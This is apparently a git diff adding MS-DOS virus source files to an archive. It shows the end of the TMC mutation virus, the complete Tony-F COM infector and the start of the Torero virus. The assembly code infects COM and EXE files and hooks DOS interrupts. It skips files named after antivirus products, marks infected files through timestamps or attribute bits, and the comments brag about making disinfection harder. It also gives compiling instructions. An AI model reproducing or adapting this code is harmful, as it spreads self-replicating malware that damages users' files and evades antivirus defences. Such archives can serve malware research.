examine_ext + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + sub si,04h ; SI = offset of the dot in the fi... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1398h ; Pointer to find_name + db 11101111b ; End of block +find_name db 11101110b ; Beginning of block + dw 1398h ; Block identification of find_name + db 01h ; One byte instruction + + dec si ; SI = offset within filename + + db 02h ; Two bytes instruction + + mov al,[si] ; AL = byte of filename + + db 02h ; Two bytes instruction + + cmp al,'/' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp al,'\' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp al,':' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp si,dx ; Beginning of filename? + + db 01110111b+10000000b ; Above? Jump to find_name + dw 1398h ; Pointer to find_name + db 01h ; One byte instruction + + dec si ; SI = offset within filename + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1397h ; Pointer to examine_name + db 11101111b ; End of block +examine_name db 11101110b ; Beginning of block + dw 1397h ; Block identification of examine_... + db 01h ; One byte instruction + + inc si ; SI = offset of beginning of file... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + xor ax,0aa55h ; Encrypt two bytes of filename + + db 03h ; Three bytes instruction + + cmp ax,('ci' xor 0aa55h) + + db 01110100b+10000000b ; Equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('on' xor 0aa55h) + + db 01110100b+10000000b ; NOD-iCE? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('ew' xor 0aa55h) + + db 01110100b+10000000b ; Dr. Web? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('bt' xor 0aa55h) + + db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ... + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('va' xor 0aa55h) + + db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i... + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('-f' xor 0aa55h) + + db 01110100b+10000000b ; F-PROT? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('cs' xor 0aa55h) + + db 01110100b+10000000b ; McAfee ViruScan? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('oc' xor 0aa55h) + + db 01110100b+10000000b ; COMMAND.COM? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('iw' xor 0aa55h) + + db 01110100b+10000000b ; WIN.COM? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('rk' xor 0aa55h) + + db 01110100b+10000000b ; Equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 02h ; Two bytes instruction + + mov cx,ds ; CX = segment of filename + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 03h ; Three bytes instruction + + mov ax,3524h ; Get interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int24_virus + + db 11101101b ; Data reference + dw 1770h ; Pointer to int24_virus + db 03h ; Three bytes instruction + + mov ax,2524h ; Set interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 02h ; Two bytes instruction + + mov ds,cx ; DS = segment of filename + + db 02h ; Two bytes instruction + + mov es,cx ; ES = segment of filename + + db 03h ; Three bytes instruction + + mov ax,3d02h ; Open file (read/write) + + db 03h ; Three bytes instruction + + mov bx,1234h ; BX = offset of int21_jump + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_jump + db 01h ; One byte instruction + + inc bx ; BX = offset of address of interr... + + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 03h ; Three bytes instruction + + call dword ptr cs:[bx] + + db 01110010b+10000000b ; Error? Jump to int24_store + dw 1771h ; Pointer to int24_store + db 02h ; Two bytes instruction + + mov bx,ax ; BX = file handle + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + mov ax,5700h ; Get file's date and time + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 04h ; Four bytes instruction + + mov ds:[1234h],dx ; Store file's date + + db 11101101b ; Data reference + dw 12dh ; Pointer to file_date + db 02h ; Two bytes instruction + + mov al,cl ; AL = low-order byte of file time + + db 02h ; Two bytes instruction + + and al,00011111b ; AL = file seconds + + db 02h ; Two bytes instruction + + cmp al,00000100b ; Already infected (8 seconds)? + + db 01110100b+10000000b ; Equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + and cl,11100000b ; Zero file seconds + + db 03h ; Three bytes instruction + + or cl,00000100b ; Set infection mark (8 seconds) + + db 04h ; Four bytes instruction + + mov ds:[1234h],cx ; Store file's time + + db 11101101b ; Data reference + dw 12ch ; Pointer to file_time + db 02h ; Two bytes instruction + + mov ah,3fh ; Read from file + + db 03h ; Three bytes instruction + + mov cx,03h ; Read three bytes + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 02h ; Two bytes instruction + + mov si,dx ; SI = offset of origin_code_ + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + lodsw ; AX = EXE signature + + db 03h ; Three bytes instruction + + cmp ax,'ZM' ; EXE signature? + + db 01110100b+10000000b ; Equal? Jump to infect_exe + dw 138dh ; Pointer to infect_exe + db 03h ; Three bytes instruction + + cmp ax,'MZ' ; EXE signature? + + db 01110100b+10000000b ; Equal? Jump to infect_exe + dw 138dh ; Pointer to infect_exe + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_cs_ + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 04h ; Four bytes instruction + + mov [si],0fff0h ; Store initial CS relative to sta... + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_ss_ + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 04h ; Four bytes instruction + + mov [si],0fff0h ; Store initial SS relative to sta... + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_ip_ + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial IP + db 04h ; Four bytes instruction + + mov [si],100h ; Store initial IP + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_sp_ + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov [si],0fffeh ; Store initial SP + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of mcb_size__ + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 04h ; Four bytes instruction + + mov [si],0ffffh ; Store size of memory block in pa... + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of new_mcb_siz + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 04h ; Four bytes instruction + + mov [si],1000h ; Store new size in paragraphs + + db 02h ; Two bytes instruction + + mov al,00h ; COM executable + + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store executable status + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 03h ; Three bytes instruction + + mov ax,4202h ; Set current file position (EOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = low-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + cmp ax,0e000h ; Filesize too large? + + db 01110111b+10000000b ; Above? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 03h ; Three bytes instruction + + add ax,100h ; AX = delta offset + + db 03h ; Three bytes instruction + + mov ds:[01h],ax ; Store delta offset + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 03h ; Three bytes instruction + + mov cx,1234h ; CX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = low-order word of offset fr... + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 02h ; Two bytes instruction + + mov dx,di ; DX = offset of origin_code_ + + db 03h ; Three bytes instruction + + mov byte ptr [di],11101001b + + db 03h ; Three bytes instruction + + sub ax,03h ; AX = offset of virus within infe... + + db 03h ; Three bytes instruction + + mov [di+01h],ax ; Store offset of virus within inf... + + db 03h ; Three bytes instruction + + mov cx,03h ; Write three bytes + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 138eh ; Pointer to set_file_inf + db 11101111b ; End of block +set_file_inf db 11101110b ; Beginning of block + dw 138eh ; Block identification of set_file... + db 03h ; Three bytes instruction + + mov ax,5701h ; Set file's date and time + + db 04h ; Four bytes instruction + + mov cx,ds:[1234h] ; CX = new time + + db 11101101b ; Data reference + dw 12ch ; Pointer to file_time + db 04h ; Four bytes instruction + + mov dx,ds:[1234h] ; DX = new date + + db 11101101b ; Data reference + dw 12dh ; Pointer to file_date + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fah ; Block identification of close_file + db 11101111b ; End of block +close_file db 11101110b ; Beginning of block + dw 0fah ; Block identification of close_file + db 02h ; Two bytes instruction + + mov ah,3eh ; Close file + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1771h ; Pointer to int24_store + db 11101111b ; End of block +int24_store db 11101110b ; Beginning of block + dw 1771h ; Block identification of int24_store + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 03h ; Three bytes instruction + + mov ax,2524h ; Set interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fbh ; Pointer to int21_exit + db 11101111b ; End of block +int21_exit db 11101110b ; Beginning of block + dw 0fbh ; Block identification of int21_exit + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load aX from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0c9h ; Pointer to int21_jump + db 11101111b ; End of block +int21_jump db 11101110b ; Beginning of block + dw 0c9h ; Block identification of int21_jump + db 05h+10h ; Five bytes data + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; address of interrupt 21h + db 11101111b ; End of block +infect_exe db 11101110b ; Beginning of block + dw 138dh ; Block identification of infect_exe + db 02h ; Two bytes instruction + + mov al,01h ; EXE executable + + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store executable status + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; CX = low-order word of offset fi... + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 02h ; Two bytes instruction + + mov ah,3fh ; Read from file + + db 03h ; Three bytes instruction + + mov cx,18h ; Read twenty-four bytes + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of exe_header + + db 11101101b ; Data reference + dw 138fh ; Pointer to exe_header + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of exe_header + + db 11101101b ; Data reference + dw 138fh ; Pointer to exe_header + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 04h ; Four bytes instruction + + cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...? + + db 01110100b+10000000b ; Equal? Jump to maximum_mem + dw 1399h ; Pointer to maximum_mem + db 03h ; Three bytes instruction + + mov ax,[si+04h] ; AX = total number of 512-byte pa... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1399h ; Pointer to maximum_mem + db 11101111b ; End of block +maximum_mem db 11101110b ; Beginning of block + dw 1399h ; Block identification of maximum_mem + db 03h ; Three bytes instruction + + add ax,[si+0ch] ; Add maximum paragraphs to alloca... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store size of memory block in pa... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 03h ; Three bytes instruction + + mov ax,[si+0eh] ; AX = initial SS relative to star... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SS relative to sta... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + mov ax,[si+10h] ; AX = initial SP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SP + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 03h ; Three bytes instruction + + mov ax,[si+14h] ; AX = initial IP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial IP + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial_ip_ + db 03h ; Three bytes instruction + + mov ax,[si+16h] ; AX = initial CS relative to star... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial CS relative to sta... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + mov ax,14h ; AX = probability of storing inco... + + db 04h ; Four bytes instruction + + cmp ds:[1234h],ax ; Store incorrect IP? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01110111b+10000000b ; Above? Jump to set_file_pos + dw 1775h ; Pointer to set_file_pos + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (DS) + + db 03h ; Three bytes instruction + + mov bp,40h ; Random number within sixty-four + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 03h ; Three bytes instruction + + add ax,[si+14h] ; Add initial IP to random number ... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store incorrect IP + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1775h ; Pointer to set_file_pos + db 11101111b ; End of block +set_file_pos db 11101110b ; Beginning of block + dw 1775h ; Block identification of set_file... + db 03h ; Three bytes instruction + + mov ax,4202h ; Set current file position (EOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = high-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + cmp dx,06h ; Filesize too large? + + db 01110111b+10000000b ; Above? Jump to write_virus + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 03h ; Three bytes instruction + + mov cx,200h ; Divide by pages + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in pages + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 03h ; Three bytes instruction + + cmp [si+04h],ax ; Internal overlay? + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 05h ; Five bytes instruction + + mov [si+0ch],0ffffh ; Store maximum paragraphs to allo... + + db 05h ; Five bytes instruction + + mov [si+10h],7ffeh ; Store initial SP + + db 05h ; Five bytes instruction + + mov word ptr [si+14h],00h + + db 03h ; Three bytes instruction + + mov cx,10h ; Divide by paragraphs + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in paragraphs + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 01h ; One byte instruction + + inc ax ; Increase initial CS/SS relative ... + + db 03h ; Three bytes instruction + + mov [si+0eh],ax ; Store initial SS relative to sta... + + db 03h ; Three bytes instruction + + mov [si+16h],ax ; Store initial CS relative to sta... + + db 03h ; Three bytes instruction + + mov ax,[si+04h] ; AX = total number of 512-byte pa... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 03h ; Three bytes instruction + + add ax,[si+0ah] ; Add maximum paragraphs to alloca... + + db 02h ; Two bytes instruction + + mov di,ax ; DI = minimum paragraphs to alloc... + + db 01h ; One byte instruction + + pop cx ; Load CX from stack (DX) + + db 01h ; One byte instruction + + pop dx ; Load DX from stack (AX) + + db 03h ; Three bytes instruction + + and dx,1111111111110000b + + db 03h ; Three bytes instruction + + add dx,10h ; DX = low-order word of offset fr... + + db 03h ; Three bytes instruction + + adc cx,00h ; CX = high-order word of offset f... + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + add ax,1234h ; AX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 03h ; Three bytes instruction + + adc dx,00h ; Convert to 32-bit + + db 03h ; Three bytes instruction + + mov cx,200h ; Divide by pages + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in pages + + db 03h ; Three bytes instruction + + mov [si+02h],dx ; Store number of bytes in last 51... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 03h ; Three bytes instruction + + mov [si+04h],ax ; Store total number of 512-byte p... + + db 05h ; Five bytes instruction + + mov [si+0ah],800h ; Store minimum paragraphs of memo... + + db 01h ; One byte instruction + + inc ax ; Store total number of 512-byte p... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 03h ; Three bytes instruction + + add ax,[si+0ah] ; Add maximum paragraphs to alloca... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + sub di,ax ; DI = additional minimum paragrap... + + db 01110110b+10000000b ; Below or equal? Jump to dont_add... + dw 1396h ; Pointer to dont_add_mem + db 03h ; Three bytes instruction + + add [si+0ah],di ; Add additional minimum paragraph... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1396h ; Pointer to dont_add_mem + db 11101111b ; End of block +dont_add_mem db 11101110b ; Beginning of block + dw 1396h ; Block identification of dont_add... + db 06h ; Six bytes instruction + + mov word ptr ds:[01h],00h + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 03h ; Three bytes instruction + + mov cx,1234h ; CX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = low-order word of offset f... + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + mov dx,si ; DX = offset of exe_header + + db 03h ; Three bytes instruction + + mov cx,18h ; Write twenty-four bytes + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 138eh ; Pointer to set_file_inf + db 11101111b ; End of block +int24_virus db 11101110b ; Beginning of block + dw 1770h ; Block identification of int24_virus + db 02h ; Two bytes instruction + + mov al,03h ; Fail system call in progress + + db 01h ; One byte instruction + + iret ; Interrupt return + + db 11101111b ; End of block +exe_header db 11101110b ; Beginning of block + dw 138fh ; Block identification of exe_header + db 18h+10h ; Twenty-four bytes data + db 18h dup(00h) ; EXE header + db 11101111b ; End of block +file_time db 11101110b ; Beginning of block + dw 12ch ; Block identification of file_time + db 02h+10h ; Two bytes data + dw 00h ; File time + db 11101111b ; End of block +file_date db 11101110b ; Beginning of block + dw 12dh ; Block identification of file_date + db 02h+10h ; Two bytes data + dw 00h ; File date + db 11101111b ; End of block +message db 11101110b ; Beginning of block + dw 2328h ; Block identification of message + db (message_end-messag_begin)+10h +messag_begin db 0dh,0ah + db 0dh,0ah + db ' TMC 1.0 by Ender from Slovakia ',0dh,0ah + db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah + db 'Dis is level 42.',0dh,0ah + db 'Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel',0dh,0ah + db 'Personal greetings: K. K., Dark Punisher',0dh,0ah + db 0dh,0ah +message_end: + db 11101111b ; End of block + db 00h ; End of table +code_end: +table_end: + +end code_begin diff --git a/MSDOS/Virus.MSDOS.Unknown.tony-f.asm b/MSDOS/Virus.MSDOS.Unknown.tony-f.asm new file mode 100644 index 00000000..f041139e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tony-f.asm @@ -0,0 +1,201 @@ +;------------------------------------------------------------------------------; +; ; +; Tony-F ; +; ; +; Tony_F , - ; +; ; +; ?*.COM, ? . ; +; Tony-F , ; +; ( 24h) ; +; . ; +; Tony-F 21h ; +; 3, ; +; . ; +;------------------------------------------------------------------------------; + +; Turbo Assembler 2.0+ + + .model Tiny + .code + + +VirLen = offset EndCode - offset Start ; . + +;-----------------------------------------------------------------------------; + + Org 07Fh + +INT24 db ? ; 24h. + + + Org 0100h + +NewDTA db 15h dup (?) ; DTA. +FAttr db ? +FTime dw ? +FDate dw ? +FLen dw ?, ? +FName db 0Dh dup (?) + +;-----------------------------------------------------------------------------; + + Org 100h + +Start: + push ax ; AX. + +;...... 21h + + mov ax,1203h + int 2Fh ; . + + xor si,si ; +Again: ; - 2h,3h 26h. + lodsw + cmp ax,3A2Eh + je NextByte + dec si + jnz Again + jmp Done +NextByte: + lodsb + cmp al,26h + jne Again +Found: + sub si,03 + + mov dx,si + mov ax,2503H ; 21h + Int 21h ; 3. + + push cs ; DS. + pop ds + +;...... + + mov INT24,0CFh ; 24h - Iret + mov ax,2524h + mov dx,offset INT24 + Int 3 ; 24h. + + + mov ax,cs + add ah,10h + mov es,ax ; ES = CS + 64 KBytes + mov si,offset Start + xor di,di + mov cx,si ; 64KBytes + rep movsb ; - . + + mov dx,offset NewDTA ; DTA . + mov ah,1Ah + Int 3 + + mov ah,2Ah + Int 3 ; , + add dl,'A' ; + mov AllCom ,dl ; . + +;...... . + + mov dx, offset AllCom ; '?*.COM' . + mov cl,110B + mov ah,4Eh ; Find First. + Int 3 + jc Done ; + ; . +FindNext: + mov dx,offset Fname ; dx DTA. + mov ax,3D02h ; /. + Int 3 + + mov bx,ax ; . + push ds ; DS. + push es + pop ds ; DS = CS + 64 KBytes. + + mov dx,VirLen ; DX = . + mov cx,-1 ; - DS:DX . + mov ah,3Fh ; , + Int 3 ; . + + ; (AX) + add ax,Virlen ; . + jc Close ; . + + cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; ? + je Close + + push ax ; . + + xor cx,cx + xor dx,dx + mov ax,4200h ; (CX:DX) + Int 3 ; . + + pop cx ; . + ; DX 0 Fn 42. + mov ah,40h ; DS:DX + Int 3 ; + . + + mov cx,cs:FTime + mov dx,cs:FDate ; + mov ax,5701h ; DTA. + Int 3 + +Close: + pop ds ; DS. + + mov ah,3Eh ; . + Int 3 + + mov ah,4Fh + Int 3 ; Find Next, + jnc FindNext ; + ; . + + +;....... . + +Done: + mov dx,80h + mov ah,1Ah + Int 3 ; DTA. + + + push es + mov ax,offset TransF -100h ; + push ax ; 64 KBytes - + RETF ; TransF. + +;........................................ + ; +Mark db 'Tony' ; . +AllCom db '+' ; + db '*.COM',0 ; +;.......................................; . + +TRansF: + push ds + pop es + + pop ax ; AX. + + mov si,offset EndCode ; + mov di,offset Start ; 100h . + push ds ; + push di ; . + mov cx,0FFF0h -102h -Virlen + rep movsb + + RETF + +;-----------------------------------------------------------------------------; + +EndCode: + Ret ; + +;-----------------------------------------------------------------------------; + +End Start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.torero.asm b/MSDOS/Virus.MSDOS.Unknown.torero.asm new file mode 100644 index 00000000..5eee43ae --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.torero.asm @@ -0,0 +1,570 @@ +; +; +; Torero +; by Mister Sandman/29A +; +; +; +; Hoho... here you have a new coolio viral technique, especially dedicated +; to those who think that everything on viruses was invented yet :) This +; virus ain't a 'powerful' one; in fact, and as i decided to do in this +; first issue as i hadn't many time, it's a simple infector just written +; to show this new viral capability, never used before as far as i know. +; +; And what is this technique about?, you might ask. Ok... apart from DirII +; and all its family, we don't know many viruses that store the original +; header of infected files in other place than the viral code, right? +; +; AVV and i were making some researches and suddenly found ten free unused +; bytes on the directory entry of each file... and this the place where my +; virus stores the header of every file it infects :) In this way, the AV +; companies must write some specific routines for disinfecting Torero... +; this means that the cleaning of our virus is more difficult, which is +; what we're looking for :) +; +; Anyway, as every viral technique, it has some pros and some cons... and +; the cons consist on the next simple thingy: if someone copies, compress- +; es, or manipulates an infected file, it will have a different directory +; entry, and then it will be imposible to restore its original header. +; +; However, and as this is just a sample virus, i didn't pay much attention +; to this kinda probabilities, and i just used an idea Wintermute gave me: +; if the host doesn't find its original header, it will display a message +; i'm sure you all know: 'This program requires Microsoft Windows.' :) +; +; As a last (but not least) feature in this virus, don't forget to have a +; look at the infection mark, based on using the eigth attribute bit, al- +; ways empty and unused until now. This is a specially good infection mark +; for a virus, as it's very simple and doesn't get flagged because of in- +; correct time stamp and all that shit. Besides, it makes things easier +; for us when implementing stealth techniques, etc. +; +; About the name, i decided to call it 'Torero' because it's a spanish +; word which means 'bullfighter', often used for telling someone that he +; or what he did is cool, because toreros are supposed to have the biggest +; nuts around :) +; +; Compiling instructions +; +; tasm /m torero.asm +; tlink torero.obj +; exe2bin torero.exe torero.com + + + .286 +torero segment byte public + assume cs:torero,ds:torero + org 0 + +torero_start label byte +torero_size equ torero_end-torero_start + +torero_entry: call delta_offset ; Get -offset in BP +delta_offset: pop bp ; for l8r use + sub bp,offset delta_offset + + mov ah,30h ; Get DOS version + int 21h + + cmp 